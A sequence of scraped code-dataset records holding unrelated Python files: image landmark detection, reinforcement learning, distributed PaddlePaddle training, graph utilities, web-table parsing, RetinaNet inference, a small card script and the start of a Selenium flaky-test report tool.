enumeratedHistoryFeatures)\n\nstoreResult(evaluationWindows)\n\nLogger.phaseLogEnd(loggerToken)\n","sub_path":"dukascopy/EvaluationInputCreator.py","file_name":"EvaluationInputCreator.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"1743602","text":"import numpy as np\nimport torch\nfrom torchvision import transforms\nimport cv2\nfrom PIL import Image, ImageDraw\nfrom CFA import CFA\n\nclass Landmark():\n\n    # constructor\n    def __init__(self, input_file):\n        input_img_name = input_file\n        self.num_landmark = 24\n        self.img_width = 128\n        checkpoint_name = 'checkpoint_landmark_191116.pth.tar'\n\n        face_detector = cv2.CascadeClassifier('lbpcascade_animeface.xml')\n        landmark_detector = CFA(output_channel_num=self.num_landmark + 1, checkpoint_name=checkpoint_name).cpu()\n\n        normalize = transforms.Normalize(mean=[0.5, 0.5, 0.5],std=[0.5, 0.5, 0.5])\n        train_transform = [transforms.ToTensor(), normalize]\n        train_transform = transforms.Compose(train_transform)\n\n        img = cv2.imread(input_img_name)\n        faces = face_detector.detectMultiScale(img)\n        img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n        draw = ImageDraw.Draw(img)\n\n        for x_, y_, w_, h_ in faces:\n\n            # adjust the size of the face crop\n            self.x = max(x_ - w_ / 8, 0)\n            rx = min(x_ + w_ * 9 / 8, img.width)\n            self.y = max(y_ - h_ / 4, 0)\n            by = y_ + h_\n            self.w = rx - self.x\n            self.h = by - self.y\n\n\n            # image transforms\n            img_tmp = img.crop((self.x, self.y, self.x+self.w, self.y+self.h))\n            img_tmp = img_tmp.resize((self.img_width, self.img_width), Image.BICUBIC)\n            img_tmp = train_transform(img_tmp)\n            img_tmp = img_tmp.unsqueeze(0).cpu()\n\n            # estimate the heatmaps\n            self.heatmaps = landmark_detector(img_tmp)\n            self.heatmaps = self.heatmaps[-1].cpu().detach().numpy()[0]\n\n    def get_landmark(self, key):\n        res = np.empty((0, 2))\n        for i in range(self.num_landmark):\n            heatmaps_tmp = cv2.resize(self.heatmaps[i], (self.img_width, self.img_width), interpolation=cv2.INTER_CUBIC)\n            landmark = np.unravel_index(np.argmax(heatmaps_tmp), heatmaps_tmp.shape)\n            landmark_y = landmark[0] * self.h / self.img_width\n            landmark_x = landmark[1] * self.w / self.img_width\n\n            if key == \"right_eye\" and (i == 10 or i == 11 or i == 12 or i == 13 or i == 14):\n                res = np.append(res, [[self.x + landmark_x, self.y + landmark_y]], axis = 0)\n\n            if key == \"left_eye\" and (i == 15 or i == 16 or i == 17 or i == 18 or i == 19):\n                res = np.append(res, [[self.x + landmark_x, self.y + landmark_y]], axis = 0)\n\n            # get the coordinates of each face part (right eye, left eye, mouth, face, bangs, nose)\n            if i == 0:\n                r_ear_rx,r_ear_ry = landmark_x,landmark_y\n            elif i == 2:\n                l_ear_lx,l_ear_ly = landmark_x,landmark_y\n            elif i == 9:\n                nose_x, nose_y = landmark_x, landmark_y\n            elif i == 10:\n                r_eye_rx,r_eye_ry = landmark_x,landmark_y\n            elif i == 11:\n                r_eye_ux,r_eye_uy = landmark_x,landmark_y\n            elif i == 12:\n                r_eye_lx,r_eye_ly = landmark_x,landmark_y\n            elif i == 13:\n                r_eye_dx,r_eye_dy = landmark_x,landmark_y\n            elif i == 15:\n                l_eye_rx,l_eye_ry = landmark_x,landmark_y\n            elif i == 16:\n                l_eye_ux,l_eye_uy = landmark_x,landmark_y\n            elif i == 17:\n                l_eye_lx,l_eye_ly = landmark_x,landmark_y\n            elif i == 18:\n                l_eye_dx,l_eye_dy = landmark_x,landmark_y\n            elif i == 20:\n                mouth_rx,mouth_ry = landmark_x,landmark_y\n            elif i == 21:\n                mouth_ux,mouth_uy = landmark_x,landmark_y\n            elif i == 22:\n                mouth_lx,mouth_ly = landmark_x,landmark_y\n            elif i == 23:\n                mouth_dx,mouth_dy = landmark_x,landmark_y\n\n        res = res.astype('int64')\n\n        # bounding rectangle for the requested face part\n        if key == \"right_eye\":# detect the right eye and build its rectangle automatically\n            rect = (int(self.x + r_eye_rx - 15) , int(self.y + r_eye_uy - 8),int(self.x + r_eye_lx + 8),int(self.y + r_eye_dy + 5))\n        elif key == \"left_eye\":# left eye\n            rect = (int(self.x + l_eye_rx - 8) , int(self.y + l_eye_uy - 8),int(self.x + l_eye_lx + 15),int(self.y + l_eye_dy + 5))\n        elif key == \"mouth\":# mouth\n            rect = (int(self.x + mouth_rx - 8), int(self.y + mouth_uy - 8),int(self.x + mouth_lx + 8),int(self.y + mouth_dy + 5))\n        elif key == \"face\":# face\n            rect = (int(self.x),int(self.y),int(self.x + self.w),int(self.y + self.h))\n        elif key == \"bangs\":# bangs\n            rect = (int(self.x),int(self.y),int(self.x + self.w),int(self.y + self.h/2 + 20))\n        elif key == \"nose\":# nose\n            rect = (int(self.x + nose_x - 10),int(self.y + nose_y + 10),int(self.x + nose_x + 10),int(self.y + nose_y - 10))\n\n        return res, rect\n","sub_path":"landmark.py","file_name":"landmark.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"352486363","text":"from mdp.action.gym_action import GymAction, RewardCalculator\nfrom mdp.policy.greedy_policy import GreedyPolicy\n\n\nclass NStepAction(GymAction):\n    def __init__(self, discount_factor, gym_value, **kwargs):\n        super().__init__(discount_factor, gym_value, **kwargs)\n\n    def update(self, reward_calculator, next_actions, **kwargs):\n        time_step = kwargs['time_step']\n        evaluated_action_value = 0\n        if next_actions:\n            next_action = GreedyPolicy().pick_action(next_actions)\n            evaluated_action_value = next_action.evaluate()\n        reward_calculator = self.reward_calculators[time_step]\n        g = 
reward_calculator.get_reward() + reward_calculator.get_next_discount() * evaluated_action_value\n self.learn(g)\n del self.reward_calculators[time_step]\n\n def cache_reward(self, reward, step=9e20):\n for rc in self.reward_calculators.values():\n rc.cache_reward(reward, step)\n\n","sub_path":"src/mdp/action/n_step_action.py","file_name":"n_step_action.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309738232","text":"# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport os\nimport time\nimport numpy as np\nimport logging\nimport commands\nimport re\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.fluid.incubate.fleet.base.role_maker as role_maker\nfrom paddle.fluid.incubate.fleet.parameter_server.distribute_transpiler import fleet\nfrom paddle.fluid.transpiler.distribute_transpiler import DistributeTranspilerConfig\nimport py_reader_generator as py_reader\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(\"fluid\")\nlogger.setLevel(logging.INFO)\n\n\nclass FleetRunnerBase(object):\n \"\"\"\n Distribute training base class:\n This class abstracts the training process into several major steps:\n 1. input_data\n 2. net\n 3. run_pserver\n 4. run_dataset_trainer\n 5. run_pyreader_trainer\n 6. run_infer\n 7. py_reader\n 8. dataset_reader\n 9. runtime_main\n ...\n \"\"\"\n\n def input_data(self, params):\n \"\"\"\n Function input_data: Definition of input data format in the network\n Args:\n :params: the hyper parameters of network\n Returns:\n defined by users\n \"\"\"\n raise NotImplementedError(\n \"input_data should be implemented by child classes.\")\n\n def net(self, inputs, params):\n \"\"\"\n Function net: Definition of network structure\n Args:\n :inputs: input data, eg: dataset and labels. 
defined by funtion: self.input_data\n :params: the hyper parameters of network\n Returns:\n evaluation parameter, defined by users\n \"\"\"\n raise NotImplementedError(\"net should be implemented by child classes.\")\n\n def run_pserver(self, params):\n \"\"\"\n Function run_pserver: Operation method of parameter server\n Args\n :params the hyper parameters of network\n Returns:\n None\n \"\"\"\n # step1: define the role of node, configure communication parameter\n role = role_maker.UserDefinedRoleMaker(\n current_id=params.current_id,\n role=role_maker.Role.SERVER,\n worker_num=params.trainers,\n server_endpoints=params.pserver_endpoints)\n fleet.init(role)\n\n # step2: define the input data of network\n reader = None\n inputs = self.input_data(params)\n if params.is_pyreader_train:\n reader = self.py_reader(params)\n inputs = fluid.layers.read_file(reader)\n elif not params.is_dataset_train:\n raise ValueError(\"Program must has Date feed method: is_pyreader_train / is_dataset_train\")\n\n # step3: define the network\n # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network\n # Replace it with your network evaluation index,\n loss, auc_var, batch_auc_var = self.net(inputs, params)\n\n # step4: define the optimizer for your model\n optimizer = fluid.optimizer.Adam(params.learning_rate)\n optimizer = fleet.distributed_optimizer(optimizer, self.strategy)\n optimizer.minimize(loss)\n\n fleet.init_server()\n logger.info(\"PServer init success!\")\n fleet.run_server()\n\n def run_dataset_trainer(self, params):\n \"\"\"\n Function run_trainer: Operation method of dataset training node\n Args:\n :params params: the hyper parameters of network\n Returns\n :train_result: the dict of training log\n \"\"\"\n # step1: define the role of node, configure communication parameter\n role = role_maker.UserDefinedRoleMaker(\n current_id=params.current_id,\n role=role_maker.Role.WORKER,\n worker_num=params.trainers,\n server_endpoints=params.pserver_endpoints)\n fleet.init(role)\n\n # step2: define the input data of network\n inputs = self.input_data(params)\n\n # step3: define the network, same with PSERVER\n # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network\n # Replace it with your network evaluation index,\n loss, auc_var, batch_auc_var = self.net(inputs, params)\n\n # step4: define the optimizer for your model\n optimizer = fluid.optimizer.Adam(params.learning_rate)\n optimizer = fleet.distributed_optimizer(optimizer, self.strategy)\n optimizer.minimize(loss)\n\n # step5: define Executor and run startup program\n exe = fluid.Executor(fluid.CPUPlace())\n fleet.init_worker()\n # No need to exe.run(fluid.default_main_program())\n exe.run(fleet.startup_program)\n\n # step6: init dataset reader\n # Notice: Both dataset and py_reader method don't using feed={dict} to input data\n # Paddle Fluid get data by variable name\n # When we do the definition of the reader, the program has established the workflow\n dataset = self.dataset_reader(inputs, params)\n file_list = [\n str(params.train_files_path) + \"/%s\" % x\n for x in os.listdir(params.train_files_path)]\n if params.is_local_cluster:\n file_list = fleet.split_files(file_list)\n logger.info(\"file list: {}\".format(file_list))\n logger.info('----------------------NO.%s trainer ready----------------' % (params.current_id))\n\n # step7: begin to train your model, good luck\n train_result = {}\n for epoch in range(params.epochs):\n dataset.set_filelist(file_list)\n start_time = 
time.clock()\n\n # Notice: function train_from_dataset does not return fetch value\n exe.train_from_dataset(\n program=fleet.main_program,\n dataset=dataset,\n fetch_list=[auc_var],\n fetch_info=['auc'],\n print_period=10,\n debug=False)\n end_time = time.clock()\n self.record_time(epoch, train_result, end_time - start_time)\n self.record_memory(epoch, train_result)\n logger.info(\"epoch %d finished, use time=%d\\n\" % ((epoch), end_time - start_time))\n if params.is_first_trainer:\n model_path = str(params.model_path) + '/trainer_' + str(params.current_id) + '_epoch_' + str(epoch)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n if params.is_first_trainer:\n train_method = '_dataset_train'\n model_path = str(params.model_path + '/final' + train_method)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n logger.info(\"Train Success!\")\n fleet.stop_worker()\n return train_result\n\n def run_pyreader_trainer(self, params):\n \"\"\"\n Function run_trainer: Operation method of py_reader training node\n Args:\n :params params: the hyper parameters of network\n Returns\n :train_result: the dict of training log\n \"\"\"\n # step1: define the role of node, configure communication parameter\n role = role_maker.UserDefinedRoleMaker(\n current_id=params.current_id,\n role=role_maker.Role.WORKER,\n worker_num=params.trainers,\n server_endpoints=params.pserver_endpoints)\n fleet.init(role)\n\n # step2: define the input data of network\n inputs = self.input_data(params)\n reader = self.py_reader(params)\n inputs = fluid.layers.read_file(reader)\n\n # step3: define the network, same with PSERVER\n # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network\n # Replace it with your network evaluation index,\n loss, auc_var, batch_auc_var = self.net(inputs, params)\n\n # step4: define the optimizer for your model\n # define the optimizer for your model\n optimizer = fluid.optimizer.Adam(params.learning_rate)\n optimizer = fleet.distributed_optimizer(optimizer, self.strategy)\n optimizer.minimize(loss)\n\n # step5: define Executor and run startup program\n exe = fluid.Executor(fluid.CPUPlace())\n fleet.init_worker()\n # No need to exe.run(fluid.default_main_program())\n exe.run(fleet.startup_program)\n\n # step6: init py_reader reader\n # Notice: Both dataset and py_reader method don't using feed={dict} to input data\n # Paddle Fluid get data by variable name\n # When we do the definition of the reader, the program has established the workflow\n train_generator = py_reader.CriteoDataset(params.sparse_feature_dim)\n file_list = [\n str(params.train_files_path) + \"/%s\" % x\n for x in os.listdir(params.train_files_path)]\n if params.is_local_cluster:\n file_list = fleet.split_files(file_list)\n logger.info(\"file list: {}\".format(file_list))\n train_reader = paddle.batch(\n paddle.reader.shuffle(\n train_generator.train(file_list, params.trainers,\n params.current_id),\n buf_size=params.batch_size * 100),\n batch_size=params.batch_size)\n reader.decorate_paddle_reader(train_reader)\n\n # step7: define the compiled program\n exec_strategy = fluid.ExecutionStrategy()\n exec_strategy.num_threads = int(params.cpu_num)\n build_strategy = fluid.BuildStrategy()\n build_strategy.async_mode = self.async_mode\n if params.sync_mode == 'async':\n build_strategy.memory_optimize = False\n if int(params.cpu_num) > 1:\n build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce\n compiled_prog = fluid.compiler.CompiledProgram(\n 
fleet.main_program).with_data_parallel(\n loss_name=loss.name,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy)\n logger.info('----------------------NO.%s trainer ready----------------' % (params.current_id))\n\n # step8: begin to train your model, good luck\n train_result = {}\n for epoch in range(params.epochs):\n # Notice: py_reader should use try & catch EOFException method to enter the dataset\n # reader.start() must declare in advance\n reader.start()\n start_time = time.clock()\n batch_id = 0\n try:\n while True:\n loss_val, auc_val, batch_auc_val = exe.run(\n program=compiled_prog,\n fetch_list=[\n loss.name, auc_var.name, batch_auc_var.name\n ])\n loss_val = np.mean(loss_val)\n auc_val = np.mean(auc_val)\n batch_auc_val = np.mean(batch_auc_val)\n if batch_id % 10 == 0 and batch_id != 0:\n logger.info(\n \"TRAIN --> pass: {} batch: {} loss: {} auc: {}, batch_auc: {}\"\n .format(epoch, batch_id, loss_val / params.\n batch_size, auc_val, batch_auc_val))\n batch_id += 1\n except fluid.core.EOFException:\n reader.reset()\n\n end_time = time.clock()\n train_result = self.record_time(epoch, train_result, end_time - start_time)\n train_result = self.record_memory(epoch, train_result)\n logger.info(\"epoch %d finished, use time=%d\\n\" % ((epoch), end_time - start_time))\n if params.is_first_trainer:\n model_path = str(params.model_path) + '/trainer_' + str(params.current_id) + '_epoch_' + str(epoch)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n if params.is_first_trainer:\n train_method = '_pyreader_train'\n model_path = str(params.model_path + '/final' + train_method)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n logger.info(\"Train Success!\")\n fleet.stop_worker()\n return train_result\n\n def run_infer(self, params):\n \"\"\"\n Function run_infer: Operation method of training node\n Args:\n :params params: the hyper parameters of network\n Returns\n :infer_result, type:dict, record the evalution parameter and program resource usage situation\n \"\"\"\n place = fluid.CPUPlace()\n dataset = py_reader.CriteoDataset(params.sparse_feature_dim)\n file_list = [\n str(params.test_files_path) + \"/%s\" % x\n for x in os.listdir(params.test_files_path)\n ]\n test_reader = paddle.batch(\n dataset.test(file_list), batch_size=params.batch_size)\n startup_program = fluid.framework.Program()\n test_program = fluid.framework.Program()\n\n def set_zero(var_name):\n param = fluid.global_scope().var(var_name).get_tensor()\n param_array = np.zeros(param._get_dims()).astype(\"int64\")\n param.set(param_array, place)\n\n with fluid.framework.program_guard(test_program, startup_program):\n with fluid.unique_name.guard():\n inputs = self.input_data(params)\n loss, auc_var, batch_auc_var= self.net(inputs, params)\n\n exe = fluid.Executor(place)\n feeder = fluid.DataFeeder(feed_list=inputs, place=place)\n\n train_method = ''\n if params.is_pyreader_train:\n train_method = '_pyreader_train/'\n else:\n train_method = '_dataset_train/'\n model_path = params.model_path + '/final' + train_method\n fluid.io.load_persistables(\n executor=exe,\n dirname=model_path,\n main_program=fluid.default_main_program())\n\n auc_states_names = ['_generated_var_0','_generated_var_1','_generated_var_2', '_generated_var_3']\n for name in auc_states_names:\n set_zero(name)\n\n run_index = 0\n infer_auc = 0\n L = []\n for batch_id, data in enumerate(test_reader()):\n loss_val, auc_val = exe.run(test_program,\n feed=feeder.feed(data),\n fetch_list=[loss, auc_var])\n run_index += 1\n 
infer_auc = auc_val\n L.append(loss_val / params.batch_size)\n if batch_id % 1000 == 0:\n logger.info(\"TEST --> batch: {} loss: {} auc: {}\".format(\n batch_id, loss_val / params.batch_size, auc_val))\n\n infer_loss = np.mean(L)\n infer_result = {}\n infer_result['loss'] = infer_loss\n infer_result['auc'] = infer_auc\n log_path = params.log_path + '/infer_result.log'\n print(str(infer_result))\n with open(log_path, 'w+') as f:\n f.write(str(infer_result))\n logger.info(\"Inference complete\")\n return infer_result\n\n def py_reader(self, params):\n \"\"\"\n Function py_reader: define the data read method by fluid.layers.py_reader\n help: https://www.paddlepaddle.org.cn/documentation/docs/zh/1.5/api_cn/layers_cn/io_cn.html#py-reader\n Args:\n :params params: the hyper parameters of network\n Returns:\n defined by user\n \"\"\"\n raise NotImplementedError(\n \"py_reader should be implemented by child classes.\")\n\n def dataset_reader(self, inputs, params):\n \"\"\"\n Function dataset_reader: define the data read method by fluid.dataset.DatasetFactory\n help: https://www.paddlepaddle.org.cn/documentation/docs/zh/1.5/api_cn/dataset_cn.html#fluid-dataset\n Args:\n :params inputs: input data, eg: dataset and labels. defined by funtion: self.input_data\n :params params: the hyper parameters of network\n Returns:\n defined by user\n \"\"\"\n raise NotImplementedError(\n \"dataset_reader should be implemented by child classes.\")\n\n def record_time(self, epoch, train_result, time):\n \"\"\"\n record the operation time\n \"\"\"\n train_result[epoch] = {}\n train_result[epoch]['time'] = time\n return train_result\n\n def record_memory(self, epoch, train_result):\n info = process_info()\n logger.info(info)\n train_result[epoch]['memory'] = info['mem']\n train_result[epoch]['cpu'] = info['cpu']\n train_result[epoch]['rss'] = info['rss']\n train_result[epoch]['vsa'] = info['vsa']\n return train_result\n \n def runtime_main(self, params):\n \"\"\"\n Function runtime_main: the entry point for program running\n Args:\n :params params: the hyper parameters of network\n \"\"\"\n\n # Step1: get the environment variable, mainly related to network communication parameters\n params.role = os.getenv(\"TRAINING_ROLE\")\n logger.info(\"Training role: {}\".format(params.role))\n\n params.current_id = int(os.getenv(\"PADDLE_TRAINER_ID\"))\n logger.info(\"Current Id: {}\".format(params.current_id))\n\n params.trainers = int(os.getenv(\"PADDLE_TRAINERS_NUM\"))\n logger.info(\"Trainer num: {}\".format(params.trainers))\n\n params.pserver_ports = os.getenv(\"PADDLE_PORT\")\n logger.info(\"Pserver ports: {}\".format(params.pserver_ports))\n\n params.pserver_ip = os.getenv(\"PADDLE_PSERVERS\")\n logger.info(\"Pserver IP: {}\".format(params.pserver_ip))\n\n params.current_endpoint = os.getenv(\"POD_IP\", \"localhost\") + \":\" + params.pserver_ports\n\n params.cpu_num = int(os.getenv(\"CPU_NUM\"))\n logger.info(\"cpu num: {}\".format(params.cpu_num))\n\n # Step2: decide communication mode between PSERVER & TRAINER\n # recommended mode: pyreader + sync_mode / dataset + async_mode\n self.strategy = DistributeTranspilerConfig()\n if params.sync_mode == 'sync':\n self.strategy.sync_mode = True\n self.strategy.runtime_split_send_recv = False\n self.async_mode = False\n params.batch_size = int(params.batch_size / params.trainers)\n elif params.sync_mode == 'half_async':\n self.strategy.sync_mode = False\n self.async_mode = False\n self.strategy.runtime_split_send_recv = False\n elif params.sync_mode == 'async' or 
params.is_dataset_train:\n self.strategy.sync_mode = False\n self.async_mode = True\n self.strategy.runtime_split_send_recv = True\n\n # Step3: Configure communication IP and ports\n # If we use local cluster simulate real distributed environment:\n # -- PSERVER have same IP but different port\n # In the real distributed cluster computing environment:\n # -- PSERVER have same port but different IP\n if params.is_local_cluster:\n for port in params.pserver_ports.split(\",\"):\n params.pserver_endpoints.append(':'.join(\n [params.pserver_ip, port]))\n else:\n for ip in params.pserver_ip.split(\",\"):\n params.pserver_endpoints.append(':'.join(\n [ip, params.pserver_ports]))\n\n params.endpoints = \",\".join(params.pserver_endpoints)\n logger.info(\"pserver_endpoints: {}\".format(params.pserver_endpoints))\n\n if params.role == \"TRAINER\" and params.current_id == 0:\n params.is_first_trainer = True\n\n # Step4: According to the environment parameters-> TRAINING_ROLE, decide which method to run\n train_result = {}\n if params.role == \"PSERVER\":\n self.run_pserver(params)\n elif params.role == \"TRAINER\":\n if params.is_dataset_train:\n train_result = self.run_dataset_trainer(params)\n elif params.is_pyreader_train:\n train_result = self.run_pyreader_trainer(params)\n else:\n raise ValueError(\"Please choice training role for current node : PSERVER / TRAINER\")\n \n # Step5: If the role is first trainer, after training, perform verification on the test data\n result = dict()\n infer_result = {}\n if params.is_first_trainer:\n infer_result = self.run_infer(params)\n result[0] = dict()\n result[0]['loss'] = infer_result['loss']\n result[0]['auc'] = infer_result['auc']\n result[1] = train_result[0]['time']\n elif params.role == \"TRAINER\" and params.current_id != 0:\n result[1] = train_result[0]['time']\n result_path = params.log_path + '/' + str(params.current_id) + '_result.log'\n with open(result_path, 'w') as f:\n f.write(str(result))\n\n logger.info(\"Distribute train success!\")\n\ndef process_info():\n pid = os.getpid()\n res = commands.getstatusoutput('ps aux|grep ' + str(pid))[1].split('\\n')[0]\n p = re.compile(r'\\s+')\n l = p.split(res)\n info = {'user': l[0],\n 'pid': l[1],\n 'cpu': l[2],\n 'mem': l[3],\n 'vsa': l[4],\n 'rss': l[5], }\n return info\n","sub_path":"examples/distribute_ctr/distribute_base.py","file_name":"distribute_base.py","file_ext":"py","file_size_in_byte":22072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"226646206","text":"#!/usr/bin/python3\n\nfrom itertools import product\nfrom functools import reduce\nfrom copy import deepcopy\n\n\n\ndef point_and_neighbors(point):\n x, y = point\n return {(x + dx, y + dy) for dx, dy in product([-1, 0, +1], [-1, 0, +1])}\n\n\ndef all_neighbors(points):\n return reduce(\n lambda a, b: a | b,\n map(lambda point: point_and_neighbors(point), points),\n set()\n ) - set(points)\n\n\ndef neighbors(points, graph):\n return all_neighbors(points) & graph\n\n\ndef connectivity_components(graph):\n points = deepcopy(graph)\n components = []\n current_component = set()\n while points:\n start_point = points.pop()\n current_component = {start_point}\n neighborhood = neighbors(current_component, points)\n while neighborhood:\n current_component |= neighborhood\n points -= neighborhood\n neighborhood = neighbors(neighborhood, points)\n components.append(current_component)\n return components\n\n\ndef mass_center(points):\n if not points:\n raise ZeroDivisionError(\"points must be 
not empty\")\n center = reduce(lambda a, b: (a[0]+b[0], a[1]+b[1]), points, (0, 0))\n return (center[0] * 1. / len(points), center[1] * 1. / len(points))\n\n\n\n\n\n\n\n\n# if __name__ == '__main__':\n \n# c1 = {\n# (0, 0), (0, 1), (1, 1), (1, 0), (2, 1), (1, 2),\n# (2, 2), (3, 1), (1, 3), (3, 2), (2, 3), (3, 3), \n# (4, 2), (5, 2), (4, 3), (5, 3), \n# (2, 4), (2, 5), (3, 4), (3, 5), \n# (4, 4), (4, 5), (5, 4), (5, 5)\n# } \n# c2 = {\n# (7, 0), (8, 0), (7, 1), (7, 2)\n# } \n# c3 = {\n# (7, 4), (8, 4), (8, 5)\n# }\n\n# graph = c1 | c2 | c3\n\n# print mass_center(c1)\n# print mass_center(c2)\n# print mass_center(c3)\n\n# print connectivity_components(graph)\n\n \n\n","sub_path":"src/graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633227221","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://stepik.org/media/attachments/lesson/209723/3.html\").read().decode(\"utf-8\")\nsoup = BeautifulSoup(html, 'html.parser')\nelements = soup.find_all('td')\nsum = 0\nfor i in elements:\n sum += int(i.contents[0])\nprint(sum)\n","sub_path":"1_beautifulsoup_web_pages_parsing/1_4_1_table_parsing.py","file_name":"1_4_1_table_parsing.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"281269162","text":"from keras_retinanet import models\nfrom keras_retinanet.preprocessing.csv_generator import CSVGenerator\nimport numpy as np\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\nfrom keras_retinanet.utils.visualization import draw_box, draw_caption\nfrom keras_retinanet.utils.colors import label_color\n\n# import miscellaneous modules\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n\n\nmodel = models.load_model('/home/nader/scratch/resnet50_csv_50_inf.h5', backbone_name='resnet50')\n# anns = '/home/nader/scratch/anns_test.csv'\nanns = '/home/nader/scratch/inf_boxes_huon_13_ans.csv'\ncls = '/home/nader/scratch/classes.csv'\n\nvalidation_generator = CSVGenerator(anns, cls)\n\n# ims = np.array(())\n# for i in range(validation_generator.size()):\n# im = validation_generator.load_image(i)\n# ims.append(im)\n# print(np.shape(ims))\n\nfor i in range(validation_generator.size()):\n im = validation_generator.load_image(i)\n # im = np.reshape(im,(1,1024,1360,3))\n # copy to draw on\n draw = im.copy()\n draw = cv2.cvtColor(draw, cv2.COLOR_BGR2RGB)\n\n # preprocess image for network\n im = preprocess_image(im)\n im, scale = resize_image(im)\n\n\n labels_to_names = {0: 'lobster'}\n\n boxes,scores,labels = model.predict_on_batch(np.expand_dims(im, axis=0))\n\n\n\n # correct for image scale\n boxes /= scale\n for box, score, label in zip(boxes[0], scores[0], labels[0]):\n # scores are sorted so we can break\n if score < 0.5:\n break\n\n color = label_color(label)\n\n b = box.astype(int)\n draw_box(draw, b, color=color)\n\n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\n draw_caption(draw, b, caption)\n print(score)\n plt.figure(figsize=(15, 15))\n plt.axis('off')\n plt.imshow(draw)\n plt.show()\n # imname = validation_generator.image_names[i][:-4]+'out.png'\n # cv2.imwrite(imname, draw)\n\n# cv2.imwrite('out.png', 
draw)","sub_path":"retinanet_inf.py","file_name":"retinanet_inf.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"524470890","text":"def throwHand(card):\n\tif card == \"a\":\n\t\ttmp = handA[0]\n\t\tlist(handA).pop(0)\n\telif card == \"b\":\n\t\ttmp = handB[0]\n\t\tlist(handB).pop(0)\n\telif card == \"c\":\n\t\ttmp = handC[0]\n\t\tlist(handC).pop(0)\n\t\n\treturn tmp\n\n\nhandA = input()\nhandB = input()\nhandC = input()\nlist(handA)\nlist(handB)\nlist(handC)\ntmpMain = throwHand(handA[0])\n\nwhile len(handA) > 0 or len(handB) > 0 or len(handC):\n\ttmpMain = throwHand(tmpMain)\n\nprint(tmpMain)","sub_path":"inazuma/python/Bprob/045.py","file_name":"045.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"306246475","text":"import os\nfrom selenium import webdriver\nfrom pathlib import Path\n\n\"\"\"\nFlow\nStore the path to all files reports from robot report.html in a list\nOpen each file using for loop\nOnce opened, scrap the page to get the test status\nStore the test name and the status in a list\nAt the end, output the list test name and result to one flake_report.html\n\nIMPORTANT: Need to have the output directory previously created.\n\"\"\"\n\n\nclass FlakeTestsReport:\n\n def __init__(self, in_path: str, out_path: str):\n self.driver = None\n self.root_path = in_path\n self.files_list = []\n self.output_directory = out_path\n\n @staticmethod\n def get_build_number_sort(elem):\n return str(elem).split('-')[0]\n\n def get_files_path(self):\n logs_name = os.listdir(self.root_path)\n logs_name.sort(key=FlakeTestsReport.get_build_number_sort)\n\n for ln in logs_name:\n self.files_list.append(self.root_path + ln)\n\n def get_reports_status(self):\n self.driver = webdriver.Firefox(executable_path=os.getcwd() + '/geckodriver')\n final_list = []\n\n for fl in self.files_list:\n build_number = str(fl).split('/')[-1].split('-')[0]\n self.driver.get('file://' + fl)\n self.driver.find_element_by_id('radio-critical').click()\n test_name = self.driver.find_elements_by_xpath('//td[@class=\"details-col-name\"]')\n test_result = self.driver.find_elements_by_xpath('//td[@class=\"details-col-status\"]')\n list_size = len(test_name)\n\n for i in range(list_size):\n test = [build_number, test_name[i].text, test_result[i].text]\n if test not in final_list:\n final_list.append(test)\n else:\n index = final_list.index(test)\n final_list[index].insert(len(test), test[2])\n self.driver.quit()\n\n return final_list\n\n def generate_final_report(self, final_list: list, first_build: int, last_build: int):\n\n # Create the build header for report\n build_header = ''\n for bq in range((last_build + 1) - first_build):\n build_header = build_header + 'Build ' + str(first_build + bq) + ''\n\n new_column = ''\n test = ''\n\n for fl in final_list:\n results = fl[2:]\n color_result = ''\n for r in results:\n if r.__eq__('PASS'):\n color_result = color_result + '' + r + ''\n else:\n color_result = color_result + '' + r + ''\n\n test = test + '' + fl[1] + '' + (int(fl[0]) - first_build) * new_column + color_result + ''\n\n return 'Test Name' + build_header + '' + test\n\n def output_html(self, tests_result: str):\n header = \"\"\"\n \n \n Flake tests report\n \n \n \n \"\"\"\n\n footer = \"\"\"\n
